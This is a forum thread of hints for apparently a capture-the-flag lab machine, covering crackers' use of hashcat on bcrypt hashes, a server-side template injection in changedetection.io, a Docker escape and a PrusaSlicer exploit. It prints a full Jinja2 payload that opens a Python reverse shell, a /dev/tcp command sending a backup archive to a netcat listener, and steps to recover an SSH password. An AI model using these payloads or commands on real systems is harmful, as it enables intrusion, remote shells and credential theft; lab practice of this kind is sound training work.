[russairussi3]

Can someone explain to me what kind of hash that is in the sql database and with what flags on hashcat you would crack it? I know whats its cracked to but I am interested in how thats done

[breachhacks9]

The PoC not working...
Tried everything..

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Accusing forum user of being a fraudster without making any deal

[Lbourdet]

Can someone explain to me what kind of hash that is in the sql database and with what flags on hashcat you would crack it? I know whats  its cracked to but I am interested in how thats done

Hey, I don’t know if you found your answer yet, but you can identify the hash type with hashid or hash-identifier in your Linux console. Once you have the returned hash type, you can search for it using
hashcat -h | grep <typeOfHash>. This will give you the possible numbers for the hash mode in Hashcat.
Since it's Blowfish, the hash mode for Hashcat is 3200. So, you can run:
hashcat -m 3200 -a 0 hash.txt wordlist.txt

[DeathReaper]

For triggering launch of Root PoC:

1. start a web-server on the machine "python3 -m http.server 8000"
   
2. On  the changedetect.io site "Add New Change" enter the URL http://172.17.0.1:8000" && "Edit > Watch"
   
3. Set the Notification Url to "get://<attacker-ip>" && the Notification Body to the one from the PoC except change your to your IP & Port
   
   {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"listen_ip\",listen_port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}{% endif %}{% endfor %}
4. Add an index.html file or literally anything && re-check the website from changedetection dashboard. This should trigger the SSTI && get a shell
   

It needs to detect a change && have a Notification URL set in order for the notification body to be triggered.

IT NOT WORKING!!!!

In the step 2 use http://<your IP>:<your python server port>. And it works for me!!

[lugia72]

rooted, thank everyone for hints

[Com41n]

any hints on getting root...looks like theres a docker breakout but cant figure it out...

[maggi]

any hints on getting root...looks like theres a docker breakout but cant figure it out...

It got patched, root passwd used to be in the .bash_history in the comtainer and has been changed 

I believe this is the intended:
https://www.exploit-db.com/exploits/51983

[fuckedupindacrib]

root from docker container:

inside container in /datastore/Backups you have zip files.

transfer out with `cat backupfile.zip > /dev/tcp/172.17.0.1/port` to a nc listener as james

You can then move files to your machine and run brotli -d on a .txt.br file to find adams password for ssh

Once it prusa exploit: https://www.exploit-db.com/exploits/51983

I use 7zip to edit file to include payload. Make sure to fix file with "; output_filename_format = something.gcode" as well

Then run slicer and win

[ploplopfr]

root from docker container:

inside container in /datastore/Backups you have zip files.

transfer out with `cat backupfile.zip > /dev/tcp/172.17.0.1/port` to a nc listener as james

You can then move files to your machine and run brotli -d on a .txt.br file to find adams password for ssh

Once it prusa exploit: https://www.exploit-db.com/exploits/51983

I use 7zip to edit file to include payload. Make sure to fix file with "; output_filename_format = something.gcode" as well

Then run slicer and win

Could you give a little more details for the last exploit around prusa ? I understand I need to write the payload into the Slic3r_PE.config file and re-zip the .3mf file. What I don't understand is the syntax you need as Slic3r_PE.config is an XML file, and I don't find any documentation about how you define the post_process feature in this XML file...

[fuckedupindacrib]

root from docker container:

inside container in /datastore/Backups you have zip files.

transfer out with `cat backupfile.zip > /dev/tcp/172.17.0.1/port` to a nc listener as james

You can then move files to your machine and run brotli -d on a .txt.br file to find adams password for ssh

Once it prusa exploit: https://www.exploit-db.com/exploits/51983

I use 7zip to edit file to include payload. Make sure to fix file with "; output_filename_format = something.gcode" as well

Then run slicer and win

Could you give a little more details for the last exploit around prusa ? I understand I need to write the payload into the Slic3r_PE.config file and re-zip the .3mf file. What I don't understand is the syntax you need as Slic3r_PE.config is an XML file, and I don't find any documentation about how you define the post_process feature in this XML file...

Use the 3mf file from the box. You should be able to ctrl+f to find the post_process and output_filename_format to edit.